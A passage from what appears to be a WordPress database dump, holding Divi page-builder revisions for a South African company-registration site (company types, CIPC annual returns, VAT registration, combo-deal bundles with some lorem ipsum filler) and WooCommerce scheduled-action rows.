\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"103%\" custom_padding=\"||11px|||\" height=\"568px\" module_alignment=\"center\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 16:23:06','2019-08-15 14:23:06','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32972,3,'2019-08-19 09:19:00','2019-08-19 07:19:00','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Combo Deals</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.26.6\" custom_padding=\"0px|||||\" custom_margin=\"-106px||||false|false\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>The Benefits Of Combo Deals.</h2>[/et_pb_text][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus.</p>\n<p>&nbsp;</p>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Basic Bundle\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" box_shadow_spread=\"19px\" link_option_url=\"https://companyregistration.online/shop/combo-deals/basic-bundle/\"][/et_pb_blurb][et_pb_blurb title=\"Tender Ready\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" box_shadow_spread=\"19px\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" link_option_url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Gold Bundle\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" box_shadow_spread=\"19px\" link_option_url=\"https://companyregistration.online/shop/combo-deals/gold-bundle/\" url=\"https://companyregistration.online/shop/combo-deals/gold-bundle/\"][/et_pb_blurb][et_pb_blurb title=\"Business Pro\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" box_shadow_spread=\"19px\" url=\"https://companyregistration.online/shop/combo-deals/business-pro/\" link_option_url=\"https://companyregistration.online/shop/combo-deals/business-pro/\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Combo Deals','','inherit','closed','closed','','32864-revision-v1','','','2019-08-19 09:19:00','2019-08-19 07:19:00','',32864,'https://companyregistration.online/32864-revision-v1/',0,'revision','',0),(32859,0,'2019-08-16 08:47:25','2019-08-16 08:47:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5670c9538c04.79598458-H6c7YYF3r0KtjXXiBNpZsYJmwa566hqh','','','2019-08-16 11:00:57','2019-08-16 09:00:57','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32859',0,'scheduled-action','',3),(32860,0,'2019-08-16 08:47:25','2019-08-16 08:47:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5670c9778d18.80347472-luIXnfFwn9p7fEy0CGP8MwE2ZshWQ97t','','','2019-08-16 11:00:57','2019-08-16 09:00:57','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32860',0,'scheduled-action','',3),(32867,0,'2019-08-16 10:00:57','2019-08-16 10:00:57','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d568386ab17c2.89221261-lOkpyJbl7KTMF5e5nZ2VuLdQ2lWdxTUt','','','2019-08-16 12:20:54','2019-08-16 